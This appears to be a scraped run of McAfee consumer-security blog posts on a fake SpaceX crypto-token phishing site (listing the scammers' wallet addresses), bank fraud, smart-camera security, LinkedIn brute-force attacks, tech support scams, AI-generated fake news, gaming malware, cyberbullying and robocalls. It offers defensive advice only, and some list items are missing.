The post A Traveler’s Guide to International Cybersecurity appeared first on McAfee Blog.
Authored by: Neil Tyagi
Scam artists know no bounds—and that also applies to stealing your cryptocurrency. Crypto scams are like any other financial scam, except the scammers are after your crypto assets rather than your cash.
Crypto scammers use many tactics in other financial crimes, such as pump-and-dump scams that lure investors to purchase an asset with fake claims about its value or outright attempts to steal digital assets.
This time scammers were trying to get an investor to send a digital asset as a form of payment for a fraudulent transaction.
It starts with a Tweet used as bait to lure innocent cryptocurrency investors into purchasing a non-existent token, related to a reputed company, SpaceX.
The theme used here by scammers is the sale of the official cryptocurrency of SpaceX. In the above image we can also see the reach of the tweet is high. (224.4K views)
McAfee+ provides all-in-one online protection for your identity, privacy, and security. With McAfee+, you’ll feel safer online because you’ll have the tools, guidance, and support to take the steps to be safer online. McAfee protects against these types of scam sites with Web Advisor protection that detects malicious websites.
The link present in this tweet redirects to space[-]launch[.]net, which is already marked as malicious by McAfee.
A WHOIS search on the site reveals it is hosted on Cloudflare. Cloudflare has increasingly become the number one choice for scammers to host malicious websites and protect their assets.
A WHOIS lookup on the domain reveals redacted personal information. No surprises there
When we click on the link, it takes us to a login page and asks for SpaceX login credentials. This page was designed as a phishing page for people who have real SpaceX login credentials.
For people who don’t have SpaceX credentials, they can use the signup link.
After we log in, it redirects to a landing page where one can purchase the supposedly original cryptocurrency launched by SpaceX
As you can see, it impersonates as the official SpaceX portal for buying their token. It also has all the elements related to SpaceX and its branding.
In the above picture, we can see that scammers are employing the social engineering trick of FOMO (Fear Of Missing Out) as they have created a timer showing that the fake tokens are only available for purchase for the next 10 hours. This also makes sure that the scam would end before all the online security vendors flag the site.
Scammers also allow users to purchase fake tokens from about 22 cryptocurrencies, the prominent being Bitcoin, Ethereum, and USDT.
Scammers even offer a bonus of fake SpaceX tokens if users are ready to purchase a minimum amount
Here we can find the BTC wallet address of the scammers and see the transactions related to these wallets.
The crypto wallet addresses of scammers for the following currencies are.
Looking at transactions related to these addresses, we find people have become victims of this scam by sending payments to these wallets. The Bitcoin wallet above has gathered around 2,780 US dollars. You can also see three of the last transactions made to the account.
Similarly, for Ethereum, the scammers have gathered around 1,450 US dollars
We observed two popular cryptocurrencies, but scammers are using about 22 different crypto wallets.
Crypto phishing scams constantly evolve, and new tactics emerge regularly. Users should take the initiative to educate themselves about the latest phishing techniques and scams targeting the cryptocurrency community. Also, stay informed by researching and reading about recent phishing incidents and security best practices.
Domain | Crypto Type | Wallet address |
space[-]launch[.]net | BTC | bc1qhhec8pkhj2cxtk6u0dace8terq22hspxkr5pee |
space[-]launch[.]net | USDT | 398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
space[-]launch[.]net | ETH | 16a243E3392Ffd9A872F3fD90dE79Fe7266452F9 |
space[-]launch[.]net | XRP | rnmj4xsaaEaGvFbrsg3wCR6Hp2ZvgjMizF |
space[-]launch[.]net | DASH | XxD3tJ7RA81mZffKFiycASMiDsUdqjLFD1 |
space[-]launch[.]net | BCH | qr45csehwfm5uu9xu4mqpptsvde46t8ztqkzjlww68 |
space[-]launch[.]net | USDC | 0x398a9BF5fe5fc6CaBB4a8Be8B428138BC7356EC1 |
The post Crypto Scam: SpaceX Tokens for Sale appeared first on McAfee Blog.
Whether or not you’re much into online banking, protecting yourself from bank fraud is a must.
Online banking is well on its way to becoming a cornerstone of the banking experience overall. More and more transactions occur over the internet rather than at a teller’s window, and nearly every account has a username, password, and PIN linked with it. And whether you use your online banking credentials often or not, hackers and scammers still want to get their hands on them.
The fact is, online banking is growing and is here to stay. No longer a novelty, online banking is an expectation. Today, 78% of adults in the U.S. prefer to bank online. Meanwhile, only 29% prefer to bank in person. Further projections estimate that more than 3.6 billion people worldwide will bank online, driven in large part by online-only banks.
There’s no doubt about it. We live in a world where banking, shopping, and payments revolve around a username and password. That’s quite a bit to take in, particularly if your first experiences with banking involved walking into a branch, getting a paper passbook, and maybe even a free toaster for opening an account.
So, how do you protect yourself? Whether you use online banking regularly or sparingly, you can protect yourself from being the victim of fraud by following a few straightforward steps.
Start here. Passwords are your first line of defense. However, one thing that can be a headache is the number of passwords we have to juggle—a number that seems like it’s growing every day. Look around online and you’ll see multiple studies and articles stating that the average person has upwards of 80 to manage. Even if you have only a small percentage of those, strongly consider using a password manager. A good choice will generate strong, unique passwords for each of your accounts and store them securely for you.
In general, avoid simple passwords that people can guess or easily glean from other sources (like your birthday, your child’s birthday, the name of your pet, and so on). Additionally, make them unique from account to account. That can save you major headaches if one account gets compromised and a hacker tries to use the same password on another account.
If you want to set up your own passwords, check out this article on how you can make them strong and unique.
What exactly is two-factor authentication? It’s an extra layer of defense for your accounts. In practice, it means that in addition to providing a password, you also receive a special one-time-use code to access your account. That code might be sent to you via email or to your phone by text. In some cases, you can also receive that code by a call to your phone. Basically, two-factor authentication combines two things: something you know, like your password; and something you have, like your smartphone. Together, that makes it tougher for scammers to hack into your accounts.
Two-factor authentication is practically a standard, so much so that you already might be using it right now when you bank or use certain accounts. If not, you can see if your bank offers it as an option in your settings the next time you log in. Or, you can contact your bank for help to get it set up.
Phishing is a popular way for crooks to steal personal information by way of email, where a crook will look to phish (“fish”) personal and financial information out of you. No two phishing emails look alike. They can range from a request from a stranger posing as a lawyer who wants you to help with a bank transfer—to an announcement about (phony) lottery winnings. “Just send us your bank information and we’ll send your prize to you!” Those are a couple of classics. However, phishing emails have become much more sophisticated in recent years. Now, slicker hackers will pose as banks, online stores, and credit card companies, often using well-designed emails that look almost the same as the genuine article.
Of course, those emails are fakes. The links they embed in those emails lead you to them, so they can steal your personal info or redirect a payment their way. One telltale sign of a phishing email is if the sender used an address that slightly alters the brand name or adds to it by tacking extra language at the end of it. If you get one of these emails, don’t click any of the links. Contact the institute in question using a phone number or address posted on their official website. This is a good guideline in general. The best avenue of communication is the one you’ve used and trusted before.
It might seem a little traditional, yet criminals still like to use the phone. In fact, they rely on the fact that many still see the phone as a trusted line of communication. This is known as “vishing,” which is short for “voice phishing.” The aim is the same as it is with phishing. The fraudster is looking to lure you into a bogus financial transaction or attempting to steal information, whether that’s financial, personal, or both. They might call you directly, posing as your bank or even as tech support from a well-known company, or they might send you a text or email that directs you to call their number.
For example, a crook might call and introduce themselves as being part of your bank or credit card company with a line like “there are questions about your account” or something similar. In these cases, politely hang up. Next, call your bank or credit card company to follow up on your own. If the initial call was legitimate, you’ll quickly find out and can handle the issue properly. If you get a call from a scammer, they can be very persuasive. Remember, though. You’re in charge. You can absolutely hang up and then follow up using a phone number you trust.
There’s a good reason not to use public Wi-Fi: it’s not private. They’re public networks, and that means they’re unsecure and shared by everyone who’s using it, which allows hackers to read any data passing along it like an open book. That includes your accounts and passwords if you’re doing any banking or shopping on it. The best advice here is to wait and handle those things at home if possible. (Or connect to public Wi-Fi with a VPN service, which we’ll cover below in a moment.)
If not, you can always use your smartphone’s data connection to create a personal hotspot for your laptop, which will be far more secure. Another option is to use your smartphone alone. With a combination of your phone’s data connection and an app from your bank, you can take care of business that way instead of using public Wi-Fi. That said, be aware of your physical surroundings too. Make sure no one is looking over your shoulder!
Some basic digital hygiene will go a long way toward protecting you even more—not only your banking and finances, but all the things you do online as well. The following quick list can help:
The post How to Protect Yourself from Bank Fraud appeared first on McAfee Blog.
People who use devices like smart cameras and Wi-Fi-enabled baby monitors should strongly consider taking the following steps to protect their devices:
1. Update your devices. Manufacturers often advise consumers to update their software to the latest version and enable further security features. Updating your devices regularly increases the chances that you’ll receive security improvements soon after they become available.
2. Do not connect to your smart cameras, baby monitors, and other devices through public Wi-Fi. Accessing these devices via a smartphone app from an unprotected network can compromise the security of your devices. Use a VPN or a secure cellular data connection instead.
3. Use strong, unique passwords. Every device of yours should have one, along with a unique username to go along with it. In some cases, connected devices ship with default usernames and passwords, making them that much easier to hack.
With those immediate steps in place, this security advisory offers you a chance to take a fresh look at your network and device security overall. With these straightforward steps in place, you’ll be more protected against such events in the future—not to mention more secure in general.
Our banks, many of the online shopping sites we use, and numerous other accounts use two-factor authentication to help validate that we’re who we say we are when logging in. In short, a username and password combo is an example of one-factor authentication. The second factor in the mix is something you, and only you, own or control, like your mobile phone. Thus, when you log in and get a prompt to enter a security code that’s sent to your mobile phone, you’re taking advantage of two-factor authentication. If your IoT device supports two-factor authentication as part of the login procedure, put it to use and get that extra layer of security.
Your router acts as the internet’s gateway into your home. From there, it works as a hub that connects all your devices—computers, tablets, and phones, along with your IoT devices as well. That means it’s vital to keep your router secure. A quick word about routers: you typically access them via a browser window and a specific address that’s usually printed somewhere on your router. Whether you’re renting your router through your internet provider or have purchased one, the internet provider’s “how to” guide or router documentation can step you through this process.
The first thing to do is change the default password of your router if you haven’t done so already. Again, use a strong method of password creation. Also, change the name of your router. When you choose a new one, go with name that doesn’t give away your address or identity. Something unique and even fun like “Pizza Lovers” or “The Internet Warehouse” are options that mask your identity and are memorable for you too. While you’re making that change, you can also check that your router is using an encryption method, like WPA2, which helps secure communications to and from your router. If you’re unsure what to do, reach out to your internet provider or router manufacturer.
Just as you can offer your human guests secure access that’s separate from your own devices, creating an additional network on your router allows you to keep your computers and smartphones separate from IoT devices. This way, if an IoT device is compromised, a hacker will still have difficulty accessing your other devices, like computers and smartphones, along with the data and info that you have stored on them. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
We mentioned this above, yet it’s so important that it calls for a second mention: make sure you have the latest software updates for your IoT devices. That will make sure you’re getting the latest functionality from your device, and updates often contain security upgrades. If there’s a setting that lets you receive automatic updates, enable it so that you always have the latest.
You’ve probably seen that you can control a lot of your connected things with your smartphone. We’re using them to set the temperature, turn our lights on and off, and even see who’s at the front door. With that, it seems like we can add the label “universal remote control” to our smartphones—so protecting our phones has become yet more important. Whether you’re an Android or iOS device user, get security software installed on your phone so you can protect all the things it accesses and controls—in addition to you and the phone as well.
Using a strong suite of security software like McAfee+ Advanced, can help defend your entire family from the latest threats and malware, make it safer to browse, and look out for your privacy too.
The post How to Protect Your Smart Cameras and Wi-Fi Baby Monitors appeared first on McAfee Blog.
If you’re a LinkedIn user, log in now and strengthen your security. Reports indicate that LinkedIn accounts are under attack.
First brought to light by Cyberint, LinkedIn users have taken to social media with word that their accounts have been frozen or outright hacked. In some cases, users received ransom notes for the return of their hacked accounts.
It appears that LinkedIn is weathering a wave of brute-force attacks. This type of attack works much like it sounds—hackers try to force their way into accounts by guessing passwords. With powerful hacking apps, they can guess millions of passwords in seconds.
As a result, one of two things is happening:
Given the scope, scale, and consistent use of the rambler.ru domain, this has all the signs of an organized attack. As of this writing, no group has claimed credit.
If any event underscores the need for strong, unique passwords, this is it.
Given today’s computing power, the password generators hackers use for brute force attacks can create millions of passwords in seconds. Weak passwords have no chance against them. It’s a simple matter of statistics.
Consider a password that uses eight numbers, uppercase and lowercase letters, and symbols. Sounds pretty strong, right? Unfortunately, a brute force attack might crack that password in as fast as one second.
Password Length(Using numbers, uppercase and lowercase letters, and symbols) |
Time to Crack the Password |
8 | One Second |
12 | Eight Months |
16 | 16 Million Years |
However, increase that password length to twelve numbers, uppercase and lowercase letters, and symbols—it’d that eight months to crack that password. Bump it up to 16, and it would take 16 million years. The longer it is, the more complex it is. And thus tougher to crack. It’s the difference between one second and 16 million years. And if a hacker’s brute force attack on one password takes too long, it’ll simply move onto the next one.
Log into your LinkedIn account now and verify that it’s indeed secure. Then, take the following steps:
Fourteen characters? Even up to 16 characters? How do you create that without just mashing on your keyboard? (Not recommended.) A layered password can do the work. It’s a way of creating a phrase and turning it into a strong, unique password that you can still remember.
Now, you have a 17-character password that challenges hackers and that’s still something you can remember.
Granted, creating strong, unique passwords for dozens and dozens of accounts can take a bit of time. (To put it mildly.) It can take yet more time if you manage them, such as if change them regularly (which can help protect you from data breaches and brute force attacks like this one at LinkedIn). Here, a password manager can help.
A password manager can create, memorize, and store strong, unique passwords. It’ll use the random numbers, letters, and characters we mentioned earlier. The passwords won’t be memorable, but the manager does the memorizing for you. You can also use it to update passwords regularly. In a time of data breaches, this offers you extra protection. Taken together, every account you have gets powerful password protection when you hand the job over to a password manager.
This wave of attacks reminds us just how powerful, or weak, our passwords can be. A strong, unique password in conjunction with two-factor authentication stands as your best defense as LinkedIn weathers these attacks. Strengthen your security.
Strengthen your other accounts as well. Hackers target websites and platforms of all sizes, and not every attack makes the headlines. Strong security measures for each of your accounts will protect you best if you end up as a hacker’s target.
The post How to Protect Your LinkedIn Account appeared first on McAfee Blog.
Instead of getting you out of a jam, tech support scams get you into one. And they can get costly.
Tech support scammers had a banner year in 2022. They raked in more than $800 million in the U.S. alone, according to the FBI’s list of reported cases. The actual figure climbs higher when you factor in all the unreported cases. And it goes yet higher still when you consider all the victims worldwide.
In all, tech support scams make up a multi-billion-dollar industry.
They make their money several ways. Sometimes the scammers who run them charge large fees to fix a non-existent problem. Other times, they’ll install information-stealing malware under the guise of software that’s supposed to correct an issue. In some cases, they’ll ask for remote access to your computer to perform a diagnosis, but access your computer to steal information instead. Or they could hit you with several of the above.
You can stumble across these scams on your own as you go about your day online. Other times, they find you, such as when the scammer calls you directly.
One of our employees shared his story when a tech support scammer called his wife out of the blue:
I was messing around on my computer before dinner. My wife came in with a strange look on her face as she told the person on the phone, “I think you might want to talk to my husband about that.” Once on the phone I was greeted with, “Hi, this is Rick from Windows support and we’re calling because your computer is sending junk files to the internet.” I knew there was no way he was from “Windows support” since a reputable company isn’t going to call me up out of the blue like this, but as a security researcher I was curious, so I jumped right in.
“Rick” said that to fix my issue he needed me to install a free remote access tool and give him access to my system. Letting an unknown person access my actual computer seemed like a bad idea, so I let him log on to a “virtual machine” that I use for security testing. The first thing he did was turn off my security software, including the antivirus and firewall. After doing that, he downloaded a file that he tried to install. Since I had additional security software in place he wasn’t aware of, the installation failed each time he tried to run it. At this point, I had the file he was trying to install, the IP address he was connecting from, and the site he used to get the malicious file. I told “Rick” that I work for a security company and would like to know what he was actually looking for. I’m fairly certain he hung up before I completed my sentence.
Sure enough, after the call, a malware scan confirmed that “Rick” wanted to install a remote access tool (RAT) that would have given him full control of the computer.
That’s one example of how these scams go. They get costly too. The FBI further reported that the average loss for a tech support scam approached $25,000. In some cases, pop-up “security alert” ads spearheaded scams that cost people $200,000 and upwards to $1 million.
Fortunately, these scams are rather easy to spot. And avoid. If you know what to look for.
Let’s start with a quick overview of tech support scams. They tend to work in two primary ways.
This might be a phone call that comes from someone posing as a rep from “Microsoft” or “Apple.” The scammer on the other end of the line will tell you that there’s something wrong with your computer or device. Something urgently wrong. And then offers a bogus solution to the bogus problem, often at a high cost. Similarly, they might reach you by way of a pop-up ad. Again telling you that your computer or device needs urgent repairs. These can find you a few different ways:
These are phony services and sites that pose as legitimate tech support but are anything but. They’ll place search ads, post other ads on social media, and so forth, ready for you to look up and get in touch with when you have a problem that you need fixed. Examples include:
Lastly, a good piece of general advice is to keep your devices and apps up to date. Regular updates often include security fixes and improvements that can help keep scammers and hackers at bay. You can set your devices and apps to download them automatically. And if you need to get an update or download on your own, get it from the company’s official website. Stay away from third-party sites that might host malware.
The post Be on the Lookout for Scam Tech Support Calls appeared first on McAfee Blog.
Spotting fake news in your feed has always been tough. Now it just got tougher, thanks to AI.
Fake news crops up in plenty of places on social media. And it has for some time now. In years past, it took the form of misleading posts, image captions, quotes, and the sharing of outright false information in graphs and charts. Now with the advent of AI, we see fake news taken to new levels of deception:
All of it’s out there. And knowing how to separate truth from fact has never been of more importance, particularly as more and more people get their news via social media.
Pew Research found that about a third of Americans say they regularly get their news from Facebook and nearly 1 in 4 say they regularly get it from YouTube. Moreover, global research from Reuters uncovered that more people primarily get their news from social media (30%) rather than from an established news site or app (22%). This marks the first time that social media has toppled direct access to news.
Yet, you can spot fake news. Plenty of it.
The process starts with a crisp definition of what fake news is, followed by the forms it takes, and then a sense of what the goals behind it are. With that, you can apply a critical eye and pick out the telltale signs.
We’ll cover it all here.
A textbook definition of fake news goes something like this:
A false news story, fabricated with no verifiable facts, and presented in a way to appear as legitimate news.
As for its intent, fake news often seeks to damage the reputation of an individual, institution, or organization. It might also spout propaganda or attempt to undermine established facts.
That provides a broad definition. Yet, like much fake news itself, the full definition is much more nuanced. Within fake news, you’ll find two categories: disinformation and misinformation:
From there, fake news gets more nuanced still. Misinformation and disinformation fall within a range. Some of it might appear comical, while other types might have the potential to do actual harm.
Dr. Claire Wardle, the co-director of the Information Futures Lab at Brown University, cites seven types of misinformation and disinformation on a scale as visualized below:
Source – FirstDraftNews.org and Brown University
Put in a real-life context, you can probably conjure up plenty of examples where you’ve seen. Like clickbait-y headlines that link to letdown articles with little substance. Maybe you’ve seen a quote pasted on the image of a public figure, a quote that person never made. Perhaps an infographic, loaded with bogus statistics and attributed to an organization that doesn’t even exist. It can take all forms.
The answers here vary as well. Greatly so. Fake news can begin with a single individual, or groups of like-minded individuals with an agenda, and it can even come from operatives for various nation-states. As for why, they might want to poke fun at someone, drive ad revenue through clickbait articles, or spout propaganda.
Once more, a visualization provides clarity in this sometimes-murky mix of fake news:
Source – FirstDraftNews.org and Brown University
In the wild, some examples of fake news and the reasons behind it might look like this:
Perhaps a few of these examples ring a bell. You might have come across somewhere you weren’t exactly sure if it was fake news or not.
The following tools can help you know for sure.
Some of the oldest advice is the best advice, and that holds true here: consider the source. Take time to examine the information you come across. Look at its source. Does that source have a track record of honesty and dealing plainly with the facts?
This falls under a similar category as “consider the source.” Plenty of fake news will take an old story and repost it or alter it in some way to make it appear relevant to current events. In recent years, we’ve seen fake news creators slap a new headline on a new photo, all to make it seem like it’s something current. Once again, a quick search can help you tell if it’s fake or not. Try a reverse image search and see what comes up. Is the photo indeed current? Who took it? When? Where?
Has a news story you’ve read or watched ever made you shake your fist at the screen or want to clap and cheer? How about something that made you fearful or simply laugh? Bits of content that evoke strong emotional responses tend to spread quickly, whether they’re articles, a post, or even a tweet. That’s a ready sign that a quick fact check might be in order. The content is clearly playing to your biases.
There’s a good reason for that. Bad actors who wish to foment unrest, unease, or spread disinformation use emotionally driven content to plant a seed. Whether or not their original story gets picked up and viewed firsthand doesn’t matter to these bad actors. Their aim is to get some manner of disinformation out into the ecosystem. They rely on others who will re-post, re-tweet, or otherwise pass it along on their behalf—to the point where the original source of the information gets completely lost. This is one instance where people readily begin to accept certain information as fact, even if it’s not factual at all.
Certainly, some legitimate articles will generate a response as well, yet it’s a good habit to do a quick fact-check and confirm what you’ve read.
A single information source or story won’t provide a complete picture. It might only cover a topic from a certain angle or narrow focus. Likewise, information sources are helmed by editors and stories are written by people—all of whom have their biases, whether overt or subtle. It’s for this reason that expanding your media diet to include a broad range of information sources is so important.
So, see what other information sources have to say on the same topic. Consuming news across a spectrum will expose you to thoughts and coverage you might not otherwise get if you keep your consumption to a handful of sources. The result is that you’re more broadly informed and can compare different sources and points of view. Using the tips above, you can find other reputable sources to round out your media diet.
Additionally, for a list of reputable information sources, along with the reasons they’re reputable, check out “10 Journalism Brands Where You Find Real Facts Rather Than Alternative Facts” published by Forbes and authored by an associate professor at The King’s College in New York City. It certainly isn’t the end all, be all of lists, yet it should provide you with a good starting point.
De-bunking fake news takes time and effort. Often a bit of digging and research too. Professional fact-checkers at news and media organizations do this work daily. Posted for all to see, they provide a quick way to get your answers. Some fact-checking groups include:
As AI continues its evolution, it gets trickier and trickier to spot it in images, video, and audio. Advances in AI give images clarity and crispness that they didn’t have before, deepfake videos play more smoothly, and voice cloning gets uncannily accurate.
Yet even with the best AI, scammers often leave their fingerprints all over the fake news content they create. Look for the following:
1) Consider the context
AI fakes usually don’t appear by themselves. There’s often text or a larger article around them. Inspect the text for typos, poor grammar, and overall poor composition. Look to see if the text even makes sense. And like legitimate news articles, does it include identifying information—like date, time, and place of publication, along with the author’s name.
2) Evaluate the claim
Does the image seem too bizarre to be real? Too good to be true? Today, “Don’t believe everything you read on the internet,” now includes “Don’t believe everything you see on the internet.” If a fake news story is claiming to be real, search for the headline elsewhere. If it’s truly noteworthy, other known and reputable sites will report on the event—and have done their own fact-checking.
3) Check for distortions
The bulk of AI technology still renders fingers and hands poorly. It often creates eyes that might have a soulless or dead look to them—or that show irregularities between them. Also, shadows might appear in places where they look unnatural. Further, the skin tone might look uneven. In deepfaked videos, the voice and facial expressions might not exactly line up, making the subject look robotic and stiff.
The fact is that fake news isn’t going anywhere. It’s a reality of going online. And AI makes it tougher to spot.
At least at first glance. The best tool for spotting fake news is a fact-check. You can do the work yourself, or you can rely on trusted resources that have already done the work.
This takes time, which people don’t always spend because social platforms make it so quick and easy to share. If we can point to one reason fake news spreads so quickly, that’s it. In fact, social media platforms reward such behavior.
With that, keep an eye on your own habits. We forward news in our social media feeds too—so make sure that what you share is truthful too.
Plenty of fake news can lure you into sketchy corners of the internet. Places where malware and phishing sites take root. Consider using comprehensive online protection software with McAfee+ to keep safe. In addition to several features that protect your devices, privacy, and identity, they can warn you of unsafe sites too. While it might not sniff out AI content (yet), it offers strong protection against bad actors who might use fake news to steal your information or harm your data and devices.
The post How to Spot Fake News in Your Social Media Feed appeared first on McAfee Blog.
Vanquishing aliens, building virtual amusement parks, mashing buttons in online battles royale. For some, playing video games is a way to unwind from the day and momentarily journey to new worlds. Others game because they love the competition or enjoy participating in the online community around their favorite game.
But just like other online realms, gaming isn’t free of cybercriminals. Cybercriminals take advantage of highly trafficked online gaming portals to make a profit on the dark web.
The next time you log on to your virtual world of choice, level up your gaming security to protect your device and your personally identifiable information (PII).
Gaming companies host a trove of valuable information. Gamers trust these platforms with their payment information, personal details, passwords, and with the safety of their gaming characters on which they spend thousands of hours and hundreds of dollars upgrading.
Cybercriminals also target gamers through malware disguised as an advantage. Cheat software for online games is common as players strive to be the best among their opponents. For instance, a malware scam targeted players seeking an advantage for “Call of Duty: Warzone.” The malware creators advertised the “cheat software” on YouTube with instructions on how to download it. The video received thousands of views and hundreds of comments, which made it look legitimate.
One of the steps in installing the “cheat software” was that users had to disable antivirus programs and firewalls. Users let the cybercriminals walk right into their device! From there, an aggressive type of fileless malware called a dropper infected the device. A dropper doesn’t download a malicious file; rather, it creates a direct pathway to deliver an additional payload, such as credential-stealing malware.1
Competitive gaming is, well, competitive. So, if you invest a lot of real money into your characters, be especially vigilant and follow these five important tips to protect your online accounts.
It’s common for gamers to use variations of their real names and birthdates in their public-facing usernames. Doing this could reveal personal information that you’d rather keep private. Consider using a nickname or a combination of random numbers instead. Along this same vein, don’t reveal personal details about yourself (phone number, hometown, places you visit regularly, etc.) on chats or streams. Lurking cybercriminals can gather these personal details to impersonate you.
On some online PC games, you can join campaigns with gamers from all over the world. While the interconnectivity is great, carefully vet who you allow to follow your online profile. If a stranger sends a friend request out of the blue, be on alert. They could have nefarious motives, such as phishing for valuable data. It’s best to customize your privacy settings to make your profile invisible to strangers.
Developers spend a lot of time creating amazing games, so make sure you purchase games legally and play them as they are intended. Research revealed that cracked versions – or unauthorized versions – of popular games sometimes hid ChromeLoader malware, which has the ability to steal credentials stored in internet browsers. Cracked versions of Call of Duty, Elden Ring, Dark Souls 3, Red Dead Redemption 2, and Roblox were found to be harboring malware.2
Be especially wary of free downloads and cheat software. Instead, go for a challenge and have fun with the game as it’s written.
A virtual private network (VPN) scrambles your online data traffic, foiling nosy digital eavesdroppers you may encounter while online gaming. A VPN makes it nearly impossible for anyone to access your IP address or spy on your online browsing.
Antivirus software can make your online gaming experience more secure. McAfee antivirus software, which is included in McAfee+, provides real-time threat protection, which means your devices are covered with 24/7 protection from ever-evolving malware and online threats.
1Ars Technica, “Malicious cheats for Call of Duty: Warzone are circulating online”
2TechRadar, “Be very careful when downloading these games online – they could be malware”
The post 5 Online Gaming Tips to Stay Safe From Cybercriminals appeared first on McAfee Blog.
More than half of children say that a cyberbully targeted them online.
That disquieting stat comes from our recent global research on cyberbullying. Overall, 57% of children said they were cyberbullied during the school year. Meanwhile, many parents remain in the dark. Only 42% of parents worldwide said they were aware that their child was bullied online. A distinct awareness gap.
And in the wake of those attacks, the risk of emotional and even physical harm follows.
That’s why talking about cyberbullying is so vital. It acknowledges that cyberbullying remains a fact of life for children today. Moreover, it gives families the tools to spot it—and help heal any harm that comes along with it.
Here, we’ll share some points that can help spark that conversation at home. We’ll look at what cyberbullying is, its signs, its trends, and the steps you can take if someone you know is getting bullied online.
“I know it when I see it” only goes so far when it comes to spotting cyberbullying. A clear definition helps far more than that. StopBullying.gov defines it as:
… [B]ullying that takes place over digital devices like cell phones, computers, and tablets. Cyberbullying can occur through SMS, text, and apps, or online in social media, forums, or gaming where people can view, participate in, or share content. Cyberbullying includes sending, posting, or sharing negative, harmful, false, or mean content about someone else. It can include sharing personal or private information about someone else causing embarrassment or humiliation. Some cyberbullying crosses the line into unlawful or criminal behavior.
Moreover, it can also include sending explicit images or messages and exclusion from group chats and conversations as well. Exclusion is an important point and sometimes gets overlooked in conversations about cyberbullying. As we’ll see, children reported it as one of the top three forms of cyberbullying they’ve experienced.
It’s no secret that children hide their online activities from their parents. Our research puts a number to that. More than half of children (59%) take some action to hide what they’re up to online. As an adult, that means you might not see the offending text, post, or content yourself. More likely, you will spot a change in behavior.
Sadness and depression commonly appear in victims. This can manifest itself in several ways, including the following signs as called out by WebMD:
In all, spotting cyberbullying involves more than keeping an eye on a child’s phone. Importantly, it calls for keeping an eye on the child.
With an understanding of what cyberbullying is, let’s look at what’s happening online.
Based on our research, children reported that name-calling, exclusion, and rumormongering were the top three forms of cyberbullying.
Also making troubling appearances in the list, by percentage:
Also uncovered in our research, sometimes the cyberbully is our own child. Among children worldwide, 19% admitted to cyberbullying another child. However, follow-up questions revealed that 53% of children admitted to one or more acts that constitute cyberbullying. Among the top responses:
With that, some children indeed cyberbully others yet remain unaware that they’re doing it. Note that exclusion appears again as one of the top three offenders, such as where children shut out others in group texts and chats.
Even in its mildest of forms, cyberbullying can lead to emotional harm. Potentially to physical harm as well.
For one, a victim of cyberbullying will likely never view the internet the same way again. An attack on a person’s digital identity is an attack on their personal identity. Both of those identities can suffer.
Children seem to agree. More than one in three (34%) said that they have deleted a social media account to avoid cyberbullying. Nearly as many children hide the hurt. Only 33% said that they sought help with cyberbullying.
This can impact mental health. Faced with a constant barrage of insults and harassment, victims of cyberbullying often grapple with negative thoughts, insecurity, and even depression after their attacks occur. In fact, according to research conducted at Penn State University, 30% of individuals who were cyberbullied turned toward self-harming behaviors and began having suicidal thoughts.
In response, 18% of parents said that they turned to therapy for support when their child was cyberbullied. Another 11% said that they took the further step of changing their child’s school because of cyberbullying. Indeed, cyberbullying can leave an indelible mark on the lives of victims and their families.
Whatever form it takes, the best way to deal with cyberbullying is to deal with it immediately.
Harassment and threats in their more extreme expressions can leave emotional scars. Victims might need support in the wake of them, possibly from a professional. You and your judgment will know what’s best here, yet given the harm it can cause, keep an eye for signs of lasting effects such as the ones mentioned above.
If you’re unsure of where to turn, you have plenty of resources available that can help start the process. In the U.S., the Department of Health & Human Services has a list of resources available for victims and their families. Likewise, the Canadian government website hosts a list of similar mental health resources, and in the UK the NHS hosts a list of resources as well.
The post Cyberbullying’s Impact on Both Society and Security appeared first on McAfee Blog.
It’s that time of year again: election season! You already know what to expect when you flip on the TV. Get ready for a barrage of commercials, each candidate saying enough to get you to like them but nothing specific enough to which they must stay beholden should they win.
What you might not expect is for sensationalist election “news” to barge in uninvited on your screens. Fake news – or exaggerated or completely falsified articles claiming to be unbiased and factual journalism, often spread via social media – can pop up anytime and anywhere. This election season’s fake news machine will be different than previous years because of the emergence of mainstream artificial intelligence tools.
Here are a few ways desperate zealots may use various AI tools to stir unease and spread misinformation around the upcoming election.
We’ve had time to learn and operate by the adage of “Don’t believe everything you read on the internet.” But now, thanks to deepfake, that lesson must extend to “Don’t believe everything you SEE on the internet.” Deepfake is the digital manipulation of a video or photo. The result often depicts a scene that never happened. At a quick glance, deepfakes can look very real! Some still look real after studying them for a few minutes.
People may use deepfake to paint a candidate in a bad light or to spread sensationalized false news reports. For example, a deepfake could make it look like a candidate flashed a rude hand gesture or show a candidate partying with controversial public figures.
According to McAfee’s Beware the Artificial Imposter report, it only takes three seconds of authentic audio and minimal effort to create a mimicked voice with 85% accuracy. When someone puts their mind to it and takes the time to hone the voice clone, they can achieve a 95% voice match to the real deal.
Well-known politicians have thousands of seconds’ worth of audio clips available to anyone on the internet, giving voice cloners plenty of samples to choose from. Fake news spreaders could employ AI voice generators to add an authentic-sounding talk track to a deepfake video or to fabricate a snappy and sleazy “hot mike” clip to share far and wide online.
Programs like ChatGPT and Bard can make anyone sound intelligent and eloquent. In the hands of rabble-rousers, AI text generation tools can create articles that sound almost professional enough to be real. Plus, AI allows people to churn out content quickly, meaning that people could spread dozens of fake news reports daily. The number of fake articles is only limited by the slight imagination necessary to write a short prompt.
Before you get tricked by a fake news report, here are some ways to spot a malicious use of AI intended to mislead your political leanings:
Is what you’re reading or seeing or hearing too bizarre to be true? That means it probably isn’t. If you’re interested in learning more about a political topic you came across on social media, do a quick search to corroborate a story. Have a list of respected news establishments bookmarked to make it quick and easy to ensure the authenticity of a report.
If you encounter fake news, the best way you can interact with it is to ignore it. Or, in cases where the content is offensive or incendiary, you should report it. Even if the fake news is laughably off-base, it’s still best not to share it with your network, because that’s exactly what the original poster wants: For as many people as possible to see their fabricated stories. All it takes is for someone within your network to look at it too quickly, believe it, and then perpetuate the lies.
It’s great if you’re passionate about politics and the various issues on the ballot. Passion is a powerful driver of change. But this election season, try to focus on what unites us, not what divides us.
The post This Election Season, Be on the Lookout for AI-generated Fake News appeared first on McAfee Blog.
Some scams make a telltale sound—rinnng, rinnng! Yup, the dreaded robocall. But you can beat them at their game.
Maybe it’s a call about renewing an extended warranty on your car (one you don’t have). Or maybe the robocaller offers up a debt relief service with a shockingly low rate. Calls like these can get annoying real quick. And they can also be scams.
